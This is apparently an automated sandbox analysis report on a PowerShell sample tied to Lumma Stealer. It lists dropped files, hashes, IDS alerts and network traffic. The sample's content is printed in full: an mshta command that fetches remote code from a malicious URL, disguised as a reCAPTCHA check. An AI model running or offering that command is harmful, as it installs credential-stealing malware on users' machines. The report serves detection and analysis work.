                                                                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e...........................................................
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6221
                                                                                                                                Entropy (8bit):3.7265626107516403
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:c07dh33CxHeikvhkvCCtu7fDhwHoefDhwHoK:3xhy++u7fXefXK
                                                                                                                                MD5:90588EA44D47115A9844D0FEA2594FA7
                                                                                                                                SHA1:2E86D9BE1886DB0E70F0BB21AA680926538FEAA9
                                                                                                                                SHA-256:CF6E9D3D537F6754575030E392CC05D5D34CAC3662A966CBE393ED6D67EB5FB4
                                                                                                                                SHA-512:1358B63DBA18F465FE7E97662D365A2ADB95845D9735912E01EBFCEE5A89FE802B422A97DD18101D69ADBEF3C2AC4C9770CBC2C70AF83BCA4B27209003DA5955
                                                                                                                                Malicious:false
                                                                                                                                Preview:...................................FL..................F.".. ...-/.v.....*T..V..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....9r..V....]..V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.q...........................%..A.p.p.D.a.t.a...B.V.1......Y.q..Roaming.@......CW.^.Y.q...........................:..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y q..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................`...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y q....Q...........
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6221
                                                                                                                                Entropy (8bit):3.7265626107516403
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:c07dh33CxHeikvhkvCCtu7fDhwHoefDhwHoK:3xhy++u7fXefXK
                                                                                                                                MD5:90588EA44D47115A9844D0FEA2594FA7
                                                                                                                                SHA1:2E86D9BE1886DB0E70F0BB21AA680926538FEAA9
                                                                                                                                SHA-256:CF6E9D3D537F6754575030E392CC05D5D34CAC3662A966CBE393ED6D67EB5FB4
                                                                                                                                SHA-512:1358B63DBA18F465FE7E97662D365A2ADB95845D9735912E01EBFCEE5A89FE802B422A97DD18101D69ADBEF3C2AC4C9770CBC2C70AF83BCA4B27209003DA5955
                                                                                                                                Malicious:false
                                                                                                                                Preview:...................................FL..................F.".. ...-/.v.....*T..V..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....9r..V....]..V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.q...........................%..A.p.p.D.a.t.a...B.V.1......Y.q..Roaming.@......CW.^.Y.q...........................:..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y q..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................`...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y q....Q...........
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:JSON data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):55
                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                Malicious:false
                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                File type:Unicode text, UTF-8 text, with no line terminators
                                                                                                                                Entropy (8bit):4.94225122847014
                                                                                                                                TrID:
                                                                                                                                  File name:00000.ps1
                                                                                                                                  File size:103 bytes
                                                                                                                                  MD5:dcca21065d466d02dc563971e2981c0e
                                                                                                                                  SHA1:5b3e32332d7d1f74261cc238c6e34b4c83b84a32
                                                                                                                                  SHA256:52d2dff33cdb7cb2eb4e81e5ac6ad9e828d4df0c7c9a5fc2e96381c7f3cd7843
                                                                                                                                  SHA512:579f30d8712956f9a319b1d5faca7003101e0476e6fe30d75665ec10ea4b3a9a459efddb5668268450febf65f61e684a4a0c14974f15056b7ad2dc844d8bd57b
                                                                                                                                  SSDEEP:3:rN6ez1JOLTL7F96Ct+RbqRF4I1yMQRWL7n:Z6eXOLbP6C0IMPy7n
                                                                                                                                  TLSH:1BB012F3551515453AD346622B6D23449339C3A83A94252764828078C0035A0D75B1DC
                                                                                                                                  File Content Preview:mshta https://scrutinycheck.cash/singl7.mp4 # ... ''I am not a robot - reCAPTCHA Verification ID: 2165
                                                                                                                                  Icon Hash:3270d6baae77db44
                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-12-25T15:10:32.806882+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449823104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:33.534400+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449823104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:33.534400+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449823104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:34.796392+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449825104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:35.555381+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449825104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:35.555381+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449825104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:37.049964+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449831104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:39.243565+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449837104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:40.011889+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449837104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:41.307454+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449843104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:43.671394+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449854104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:45.928030+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449860104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:49.426528+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449866104.21.112.1443TCP
                                                                                                                                  2024-12-25T15:10:50.190773+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449866104.21.112.1443TCP
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 25, 2024 15:09:01.542767048 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:01.542829037 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:01.542908907 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:01.551943064 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:01.551963091 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:02.784503937 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:02.784612894 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:02.834712982 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:02.834738970 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:02.835225105 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:02.835285902 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:02.837584019 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:02.883337021 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.227978945 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.228060961 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.228096962 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.228106976 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.228168011 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.228194952 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.228194952 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.228213072 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.228220940 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.228266001 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.228272915 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.228312969 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.228318930 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.228362083 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.238755941 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.238867044 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.238888979 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.238941908 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.247217894 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.247283936 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.247309923 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.247371912 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.347645998 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.347700119 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.347738028 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.347784042 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.419562101 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.419621944 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.423218012 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.423264027 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.424665928 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.424706936 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.432291031 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.432334900 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.432343960 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.432383060 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.439788103 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.439841986 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.439851046 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.439889908 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.447223902 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.447278976 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.447365046 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.447412968 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.454844952 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.454916954 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.454933882 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.454982042 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.462344885 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.462425947 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.462446928 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.462496042 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.469809055 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.469873905 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.469912052 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.469959974 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.477874041 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.477931976 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.477962017 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.478009939 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.484786034 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.484848976 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.484903097 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.484952927 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.491327047 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.491552114 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.497762918 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.497812986 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.497874975 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.497917891 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.504261017 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.504323006 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.504347086 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.504395008 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.539251089 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.539318085 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.611653090 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.611723900 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.613869905 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.613934040 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.614039898 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.614094973 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.618470907 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.618537903 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.624775887 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.624841928 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.634098053 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.634170055 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.637921095 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.637988091 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.642338991 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.642399073 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.650824070 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.650882006 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.659014940 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.659076929 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.667555094 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.667608023 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.670849085 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.670922041 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.677279949 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.677341938 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.683620930 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.683680058 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.687017918 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.687094927 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.693619013 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.693675041 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.699815035 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.699875116 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.704986095 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.705046892 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.805099010 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.805169106 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.810075998 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.810142040 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.812680960 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.812743902 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.817574024 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.817650080 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.819928885 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.819994926 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.824628115 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.824690104 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.828982115 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.829029083 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.833481073 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.833534002 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.835956097 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.836023092 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.840399027 CET44349730104.21.38.253192.168.2.4
